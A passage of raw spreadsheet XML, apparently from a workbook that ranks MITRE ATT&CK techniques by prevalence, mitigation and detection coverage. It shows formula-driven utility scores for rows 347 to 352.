        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5000000000000015E-2</v>
      </c>
      <c r="AS347" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT347" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU34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48" spans="1:47" ht="48">
      <c r="A348" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8500000000000004E-2</v>
      </c>
      <c r="B348" s="25">
        <f>SUM(H348,M348,V348)*(1+SUM(AE348,AG348,AI348,AK348,AM348))</f>
        <v>0.28500000000000003</v>
      </c>
      <c r="C348" s="25" t="s">
        <v>1397</v>
      </c>
      <c r="D348" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E348" s="25" t="s">
        <v>1398</v>
      </c>
      <c r="F348" s="51">
        <v>1</v>
      </c>
      <c r="G348" s="51">
        <v>1</v>
      </c>
      <c r="H348" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I348">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J348">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K348">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L348">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M348" s="25">
        <v>0</v>
      </c>
      <c r="N348" s="51">
        <v>0</v>
      </c>
      <c r="O348" s="51">
        <v>0</v>
      </c>
      <c r="P348" s="51">
        <v>0</v>
      </c>
      <c r="Q348" s="51">
        <v>0</v>
      </c>
      <c r="R348" s="52" t="s">
        <v>280</v>
      </c>
      <c r="S348" s="51">
        <v>8</v>
      </c>
      <c r="T348" s="52" t="s">
        <v>1399</v>
      </c>
      <c r="U348" s="51">
        <v>4</v>
      </c>
      <c r="V348" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571428</v>
      </c>
      <c r="W348">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X348">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y348">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z348">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA348">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB348">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC348" s="29" t="s">
        <v>1260</v>
      </c>
      <c r="AD348" s="25" t="str" cm="1">
        <f t="array" ref="AD348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC348)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE348" s="25">
        <f>IF(AD348="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF348" s="25" t="str" cm="1">
        <f t="array" ref="AF348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC348)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG348" s="25">
        <f>IF(AF348="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH348" s="25" t="str" cm="1">
        <f t="array" ref="AH348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC348)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI348" s="25">
        <f>IF(AH348="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ348" s="25" t="str" cm="1">
        <f t="array" ref="AJ348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC348)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK348" s="25">
        <f>IF(AJ348="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL348" s="25" t="str" cm="1">
        <f t="array" ref="AL348">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC348)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM348" s="25">
        <f>IF(AL348="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN348" s="60">
        <v>0</v>
      </c>
      <c r="AO348" s="51">
        <v>0</v>
      </c>
      <c r="AP348" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8500000000000004E-2</v>
      </c>
      <c r="AQ348" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5000000000000015E-2</v>
      </c>
      <c r="AR348" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5000000000000015E-2</v>
      </c>
      <c r="AS348" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT348" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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49" spans="1:47">
      <c r="A349" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8500000000000004E-2</v>
      </c>
      <c r="B349" s="25">
        <f>SUM(H349,M349,V349)*(1+SUM(AE349,AG349,AI349,AK349,AM349))</f>
        <v>0.28500000000000003</v>
      </c>
      <c r="C349" s="25" t="s">
        <v>1400</v>
      </c>
      <c r="D349" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E349" s="25" t="s">
        <v>1401</v>
      </c>
      <c r="F349" s="51">
        <v>1</v>
      </c>
      <c r="G349" s="51">
        <v>1</v>
      </c>
      <c r="H349" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I349">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J349">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K349">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L349">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M349" s="25">
        <v>0</v>
      </c>
      <c r="N349" s="51">
        <v>0</v>
      </c>
      <c r="O349" s="51">
        <v>1</v>
      </c>
      <c r="P349" s="51">
        <v>2</v>
      </c>
      <c r="Q349" s="51">
        <v>3</v>
      </c>
      <c r="R349" s="52" t="s">
        <v>1402</v>
      </c>
      <c r="S349" s="51">
        <v>7</v>
      </c>
      <c r="T349" s="52" t="s">
        <v>1403</v>
      </c>
      <c r="U349" s="51">
        <v>2</v>
      </c>
      <c r="V349" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571428</v>
      </c>
      <c r="W349">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X349">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y349">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z349">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA349">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB349">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC349" s="29" t="s">
        <v>1404</v>
      </c>
      <c r="AD349" s="25" t="str" cm="1">
        <f t="array" ref="AD349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC349)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE349" s="25">
        <f>IF(AD349="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF349" s="25" t="str" cm="1">
        <f t="array" ref="AF349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG349" s="25">
        <f>IF(AF349="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH349" s="25" t="str" cm="1">
        <f t="array" ref="AH349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC349)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI349" s="25">
        <f>IF(AH349="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ349" s="25" t="str" cm="1">
        <f t="array" ref="AJ349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK349" s="25">
        <f>IF(AJ349="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL349" s="25" t="str" cm="1">
        <f t="array" ref="AL349">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC349)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM349" s="25">
        <f>IF(AL349="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN349" s="60">
        <v>0</v>
      </c>
      <c r="AO349" s="51">
        <v>0</v>
      </c>
      <c r="AP349" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8500000000000004E-2</v>
      </c>
      <c r="AQ349" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5000000000000015E-2</v>
      </c>
      <c r="AR349" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5000000000000015E-2</v>
      </c>
      <c r="AS349" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT349" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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50" spans="1:47" ht="32.1">
      <c r="A350" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1849999999999998E-2</v>
      </c>
      <c r="B350" s="25">
        <f>SUM(H350,M350,V350)*(1+SUM(AE350,AG350,AI350,AK350,AM350))</f>
        <v>0.2185</v>
      </c>
      <c r="C350" s="25" t="s">
        <v>1405</v>
      </c>
      <c r="D350" s="25" t="s">
        <v>1406</v>
      </c>
      <c r="E350" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F350" s="51">
        <v>1</v>
      </c>
      <c r="G350" s="51">
        <v>0</v>
      </c>
      <c r="H350" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I350">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J350">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K350">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L350">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M350" s="25">
        <v>0</v>
      </c>
      <c r="N350" s="51">
        <v>0</v>
      </c>
      <c r="O350" s="51">
        <v>0</v>
      </c>
      <c r="P350" s="51">
        <v>1</v>
      </c>
      <c r="Q350" s="51">
        <v>5</v>
      </c>
      <c r="R350" s="52">
        <v>7.6</v>
      </c>
      <c r="S350" s="51">
        <v>1</v>
      </c>
      <c r="T350" s="52" t="s">
        <v>1382</v>
      </c>
      <c r="U350" s="51">
        <v>8</v>
      </c>
      <c r="V350" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571428</v>
      </c>
      <c r="W350">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X350">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y350">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z350">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA350">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB350">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC350" s="29" t="s">
        <v>1407</v>
      </c>
      <c r="AD350" s="25" t="str" cm="1">
        <f t="array" ref="AD350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC350)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE350" s="25">
        <f>IF(AD350="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF350" s="25" t="str" cm="1">
        <f t="array" ref="AF350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC350)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG350" s="25">
        <f>IF(AF350="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH350" s="25" t="str" cm="1">
        <f t="array" ref="AH350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC350)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI350" s="25">
        <f>IF(AH350="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ350" s="25" t="str" cm="1">
        <f t="array" ref="AJ350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC350)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK350" s="25">
        <f>IF(AJ350="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL350" s="25" t="str" cm="1">
        <f t="array" ref="AL350">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC350)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM350" s="25">
        <f>IF(AL350="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN350" s="52">
        <v>0</v>
      </c>
      <c r="AO350" s="51">
        <v>0</v>
      </c>
      <c r="AP350" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1849999999999998E-2</v>
      </c>
      <c r="AQ350" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.2833333333333333E-2</v>
      </c>
      <c r="AR350" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.2833333333333333E-2</v>
      </c>
      <c r="AS350" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT350" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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51" spans="1:47">
      <c r="A351" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8597142857142861E-2</v>
      </c>
      <c r="B351" s="25">
        <f>SUM(H351,M351,V351)*(1+SUM(AE351,AG351,AI351,AK351,AM351))</f>
        <v>0.18597142857142859</v>
      </c>
      <c r="C351" s="25" t="s">
        <v>1408</v>
      </c>
      <c r="D351" s="25" t="s">
        <v>1346</v>
      </c>
      <c r="E351" s="25" t="s">
        <v>1409</v>
      </c>
      <c r="F351" s="51">
        <v>1</v>
      </c>
      <c r="G351" s="51">
        <v>0</v>
      </c>
      <c r="H351" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I351">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J351">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K351">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L351">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M351" s="25">
        <v>0</v>
      </c>
      <c r="N351" s="51">
        <v>0</v>
      </c>
      <c r="O351" s="51">
        <v>0</v>
      </c>
      <c r="P351" s="51">
        <v>0</v>
      </c>
      <c r="Q351" s="51">
        <v>0</v>
      </c>
      <c r="R351" s="52" t="s">
        <v>1347</v>
      </c>
      <c r="S351" s="51">
        <v>3</v>
      </c>
      <c r="T351" s="52" t="s">
        <v>1348</v>
      </c>
      <c r="U351" s="51">
        <v>9</v>
      </c>
      <c r="V351" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571428</v>
      </c>
      <c r="W351">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X351">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y351">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z351">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA351">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB351">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC351" s="29" t="s">
        <v>1383</v>
      </c>
      <c r="AD351" s="25" t="str" cm="1">
        <f t="array" ref="AD351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE351" s="25">
        <f>IF(AD351="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF351" s="25" t="str" cm="1">
        <f t="array" ref="AF351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG351" s="25">
        <f>IF(AF351="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH351" s="25" t="str" cm="1">
        <f t="array" ref="AH351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC351)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI351" s="25">
        <f>IF(AH351="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ351" s="25" t="str" cm="1">
        <f t="array" ref="AJ351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK351" s="25">
        <f>IF(AJ351="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL351" s="25" t="str" cm="1">
        <f t="array" ref="AL351">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC351)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM351" s="25">
        <f>IF(AL351="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN351" s="60">
        <v>0</v>
      </c>
      <c r="AO351" s="51">
        <v>0</v>
      </c>
      <c r="AP351" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8597142857142861E-2</v>
      </c>
      <c r="AQ351" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.19904761904762E-2</v>
      </c>
      <c r="AR351" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.19904761904762E-2</v>
      </c>
      <c r="AS351" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT351" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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52" spans="1:47" ht="32.1">
      <c r="A352" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9681428571428568E-2</v>
      </c>
      <c r="B352" s="25">
        <f>SUM(H352,M352,V352)*(1+SUM(AE352,AG352,AI352,AK352,AM352))</f>
        <v>0.19681428571428572</v>
      </c>
      <c r="C352" s="25" t="s">
        <v>1410</v>
      </c>
      <c r="D352" s="25" t="s">
        <v>1346</v>
      </c>
      <c r="E352" s="25" t="s">
        <v>1411</v>
      </c>
      <c r="F352" s="51">
        <v>1</v>
      </c>
      <c r="G352" s="51">
        <v>0</v>
      </c>
      <c r="H352" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I352">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J352">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K352">
